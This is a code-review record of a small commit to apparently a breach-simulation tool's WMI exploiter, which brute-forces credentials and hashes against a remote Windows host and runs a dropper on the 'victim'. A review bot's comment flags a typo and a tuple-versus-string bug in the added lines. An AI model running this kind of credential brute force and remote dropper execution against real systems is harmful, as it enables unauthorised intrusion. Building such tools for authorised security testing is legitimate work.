Agent: Add WMI error message to results if exploit failed

Mike Salvatore 2022-03-17 12:46:08 -04:00
parent 040a23546c
commit 54bbe8bf2f
1 changed files with 11 additions and 5 deletions


@ -29,10 +29,12 @@ class WmiExploiter(HostExploiter):
def _exploit_host(self) -> ExploiterResultData: def _exploit_host(self) -> ExploiterResultData:
creds = generate_brute_force_combinations(self.options["credentials"]) creds = generate_brute_force_combinations(self.options["credentials"])
intp_creds = interruptable_iter(creds, intp_creds = interruptable_iter(
self.interrupt, creds,
"WMI exploiter has been interrupted by a stop signal from the Island", self.interrupt,
logging.INFO) "WMI exploiter has been interrupted by a stop signal from the Island",
logging.INFO,
)
for user, password, lm_hash, ntlm_hash in intp_creds: for user, password, lm_hash, ntlm_hash in intp_creds:
@ -66,6 +68,8 @@ class WmiExploiter(HostExploiter):
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash) self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
self.exploit_result.exploitation_success = True self.exploit_result.exploitation_success = True
# TODO: This check is racey at best. Is it really necessary? If we execute an agent on
# the victim and there's one already running, it will stop itself.
# query process list and check if monkey already running on victim # query process list and check if monkey already running on victim
process_list = WmiTools.list_object( process_list = WmiTools.list_object(
wmi_connection, wmi_connection,
@ -126,7 +130,7 @@ class WmiExploiter(HostExploiter):
self.add_vuln_port(port="unknown") self.add_vuln_port(port="unknown")
self.exploit_result.propagation_success = True self.exploit_result.propagation_success = True
else: else:
logger.debug( error_message = (
"Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, " "Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, "
"cmdline=%r)", "cmdline=%r)",
remote_full_path, remote_full_path,
@ -135,6 +139,8 @@ class WmiExploiter(HostExploiter):
result.ReturnValue, result.ReturnValue,
cmdline, cmdline,
) )
logger.debug(error_message)
self.exploit_results.error_message = error_message
result.RemRelease() result.RemRelease()
wmi_connection.close() wmi_connection.close()
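Review bot: The added line `self.exploit_results.error_message = error_message` spells the attribute `exploit_results`, while the rest of the method uses `self.exploit_result` (for example `self.exploit_result.propagation_success = True`), so the failure branch would presumably raise AttributeError instead of recording the message; it should read `self.exploit_result.error_message = error_message`. In the same branch, changing `logger.debug(` to `error_message = (` leaves the format string and its arguments as a parenthesised tuple, so `logger.debug(error_message)` logs the tuple's repr and the result carries a tuple rather than text. Build the string first, e.g. `error_message = "Error executing dropper '%s' ... cmdline=%r)" % (remote_full_path, ..., cmdline)` with the existing arguments, then log and assign it. Because the message now leaves the debug log and travels with the exploit result, it is worth confirming that `cmdline` never embeds credentials or other secrets. The body of `_exploit_host` extends beyond the visible hunks, and two of the format arguments fall outside them.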